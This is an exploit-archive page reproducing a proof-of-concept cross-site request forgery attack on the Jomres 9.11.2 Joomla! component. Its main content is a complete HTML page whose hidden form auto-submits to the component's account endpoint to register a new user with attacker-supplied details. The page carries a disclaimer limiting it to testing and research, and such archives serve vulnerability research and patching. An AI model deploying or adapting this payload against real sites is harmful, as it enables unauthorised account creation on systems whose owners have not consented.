Advertisement






Joomla! Component Jomres 9.11.2 Cross-Site Request Forgery (Add User)

CVE Category Price Severity
CVE-XXXX-XXXX CWE-352 $750 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-06-20
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060207

Below is a copy:

Joomla! Component Jomres 9.11.2 Cross-Site Request Forgery (Add User)
# Exploit Title: Joomla!Component jomres 9.11.2 - Cross site request forgery
# Date: 2018-06-15
# Exploit Author: L0RD
# Vendor Homepage: https://www.jomres.net/
# Software link: https://extensions.joomla.org/extension/jomres/
# Software Download: https://github.com/WoollyinWalesIT/jomres/releases/download/9.11.2/jomres.zip
# Version: 9.11.2
# Tested on: Kali linux
===================================================
# POC :

<html>
<head>
    <title>CSRF POC</title>
</head>
<body>
<form action="http://127.0.0.1/jomres/index.php?cmd=account/index" method="POST">
      <input type="hidden" name="password" value="decode" />
      <input type="hidden" name="password_verify" value="decode" />
      <input type="hidden" name="email" value="borna.nematzadeh123@gmail.com" />
      <input type="hidden" name="first_name" value="decode" />
      <input type="hidden" name="last_name" value="test" />
      <input type="hidden" name="company" value="test" />
      <input type="hidden" name="vat_no" value="100000000" />
      <input type="hidden" name="address1" value="test1" />
      <input type="hidden" name="address2" value="test2" />
      <input type="hidden" name="city" value="New York" />
      <input type="hidden" name="county" value="test" />
      <input type="hidden" name="postalcode" value="100001" />
    </form>
<script>
   document.forms[0].submit();
</script>
</body>
</html>

===================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum